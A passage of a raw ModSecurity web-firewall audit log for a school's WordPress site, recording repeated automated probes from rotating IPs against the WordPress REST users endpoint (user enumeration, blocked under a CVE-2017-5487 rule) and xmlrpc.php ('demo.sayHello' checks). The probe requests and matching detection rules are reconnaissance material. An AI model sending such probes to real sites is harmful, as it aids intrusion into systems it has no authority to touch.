Connection: close Content-Type: text/html; charset=iso-8859-1 --3e26cf29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424674327836 2281 (- - -) Stopwatch2: 1747424674327836 2281; combined=1067, p1=358, p2=677, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e26cf29-Z-- --27ff782d-A-- [17/May/2025:02:44:40 +0700] aCeVqNhEtho3ciA0wehd5QAAAJg 103.236.140.4 54190 103.236.140.4 8181 --27ff782d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --27ff782d-C-- demo.sayHello --27ff782d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --27ff782d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424680195470 6532 (- - -) Stopwatch2: 1747424680195470 6532; combined=4700, p1=620, p2=3865, p3=36, p4=38, p5=85, sr=82, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27ff782d-Z-- --a0157e72-A-- [17/May/2025:02:44:40 +0700] aCeVqEE0LfP59mkCzg419wAAAMg 103.236.140.4 54192 103.236.140.4 8181 --a0157e72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a0157e72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0157e72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424680293226 2155 (- - -) Stopwatch2: 1747424680293226 2155; combined=1008, p1=356, p2=623, p3=0, p4=0, p5=28, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0157e72-Z-- --c6a0e270-A-- [17/May/2025:02:44:46 +0700] aCeVrthEtho3ciA0wehd5wAAAIM 103.236.140.4 54198 103.236.140.4 8181 --c6a0e270-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.19 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c6a0e270-C-- demo.sayHello --c6a0e270-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6a0e270-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424686318249 4837 (- - -) Stopwatch2: 1747424686318249 4837; combined=3762, p1=444, p2=3117, p3=24, p4=27, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6a0e270-Z-- --1c4f4c7d-A-- [17/May/2025:02:44:57 +0700] aCeVudhEtho3ciA0wehd6QAAAIU 103.236.140.4 54202 103.236.140.4 8181 --1c4f4c7d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c4f4c7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c4f4c7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424697208282 1948 (- - -) Stopwatch2: 1747424697208282 1948; combined=961, p1=318, p2=617, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c4f4c7d-Z-- --c145f10d-A-- [17/May/2025:02:45:01 +0700] aCeVvdhEtho3ciA0wehd6wAAAIk 103.236.140.4 54206 103.236.140.4 8181 --c145f10d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c145f10d-C-- demo.sayHello --c145f10d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c145f10d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424701415213 6850 (- - -) Stopwatch2: 1747424701415213 6850; combined=4800, p1=595, p2=3953, p3=41, p4=41, p5=100, sr=81, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c145f10d-Z-- --1d4f6f6f-A-- [17/May/2025:02:45:10 +0700] aCeVxthEtho3ciA0wehd7QAAAIo 103.236.140.4 54210 103.236.140.4 8181 --1d4f6f6f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1d4f6f6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d4f6f6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424710769002 3155 (- - -) Stopwatch2: 1747424710769002 3155; combined=1355, p1=473, p2=854, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d4f6f6f-Z-- --b2fd7c12-A-- [17/May/2025:02:45:15 +0700] aCeVy8e47ocjCGWTS4Y--gAAAFI 103.236.140.4 54214 103.236.140.4 8181 --b2fd7c12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b2fd7c12-C-- demo.sayHello --b2fd7c12-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2fd7c12-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424715629223 5671 (- - -) Stopwatch2: 1747424715629223 5671; combined=4229, p1=558, p2=3443, p3=34, p4=37, p5=94, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2fd7c12-Z-- --b0def803-A-- [17/May/2025:02:45:56 +0700] aCeV9NhEtho3ciA0wehd8AAAAIs 103.236.140.4 54218 103.236.140.4 8181 --b0def803-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0def803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0def803-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424756928684 2915 (- - -) Stopwatch2: 1747424756928684 2915; combined=1102, p1=384, p2=694, p3=0, p4=0, p5=24, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0def803-Z-- --f3873919-A-- [17/May/2025:02:46:03 +0700] aCeV-9hEtho3ciA0wehd8QAAAI8 103.236.140.4 54222 103.236.140.4 8181 --f3873919-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.231 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f3873919-C-- demo.sayHello --f3873919-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3873919-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424763102168 4707 (- - -) Stopwatch2: 1747424763102168 4707; combined=3202, p1=465, p2=2574, p3=29, p4=33, p5=62, sr=52, sw=39, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3873919-Z-- --74dc3e5f-A-- [17/May/2025:02:46:13 +0700] aCeWBdhEtho3ciA0wehd8wAAAIY 103.236.140.4 54236 103.236.140.4 8181 --74dc3e5f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --74dc3e5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74dc3e5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424773798395 2772 (- - -) Stopwatch2: 1747424773798395 2772; combined=1271, p1=420, p2=821, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74dc3e5f-Z-- --76afae5f-A-- [17/May/2025:02:46:19 +0700] aCeWC9hEtho3ciA0wehd9QAAAJQ 103.236.140.4 54242 103.236.140.4 8181 --76afae5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.16 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76afae5f-C-- demo.sayHello --76afae5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76afae5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424779751039 4984 (- - -) Stopwatch2: 1747424779751039 4984; combined=3786, p1=467, p2=3114, p3=22, p4=24, p5=92, sr=88, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76afae5f-Z-- --95cff11f-A-- [17/May/2025:02:47:07 +0700] aCeWO9hEtho3ciA0wehd9wAAAJg 103.236.140.4 54246 103.236.140.4 8181 --95cff11f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --95cff11f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95cff11f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424827981150 3148 (- - -) Stopwatch2: 1747424827981150 3148; combined=1335, p1=461, p2=843, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95cff11f-Z-- --87fcb267-A-- [17/May/2025:02:47:15 +0700] aCeWQ8e47ocjCGWTS4Y-_QAAAFc 103.236.140.4 54250 103.236.140.4 8181 --87fcb267-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87fcb267-C-- demo.sayHello --87fcb267-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87fcb267-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424835046461 6817 (- - -) Stopwatch2: 1747424835046461 6817; combined=4779, p1=608, p2=3925, p3=41, p4=39, p5=98, sr=81, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87fcb267-Z-- --e0a12e1f-A-- [17/May/2025:02:47:51 +0700] aCeWZ8e47ocjCGWTS4Y-_gAAAEA 103.236.140.4 54254 103.236.140.4 8181 --e0a12e1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0a12e1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0a12e1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424871855409 2827 (- - -) Stopwatch2: 1747424871855409 2827; combined=1264, p1=428, p2=807, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0a12e1f-Z-- --88804e07-A-- [17/May/2025:02:47:59 +0700] aCeWb9hEtho3ciA0wehd-gAAAIU 103.236.140.4 54258 103.236.140.4 8181 --88804e07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.56 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --88804e07-C-- demo.sayHello --88804e07-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --88804e07-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424879719714 5801 (- - -) Stopwatch2: 1747424879719714 5801; combined=4253, p1=552, p2=3469, p3=34, p4=38, p5=95, sr=72, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88804e07-Z-- --4e213178-A-- [17/May/2025:02:48:03 +0700] aCeWc9hEtho3ciA0wehd_AAAAIk 103.236.140.4 54262 103.236.140.4 8181 --4e213178-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4e213178-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e213178-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424883156331 2256 (- - -) Stopwatch2: 1747424883156331 2256; combined=990, p1=323, p2=635, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e213178-Z-- --6b707d75-A-- [17/May/2025:02:48:11 +0700] aCeWe9hEtho3ciA0wehd_gAAAIo 103.236.140.4 54266 103.236.140.4 8181 --6b707d75-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.153 X-Forwarded-Proto: https 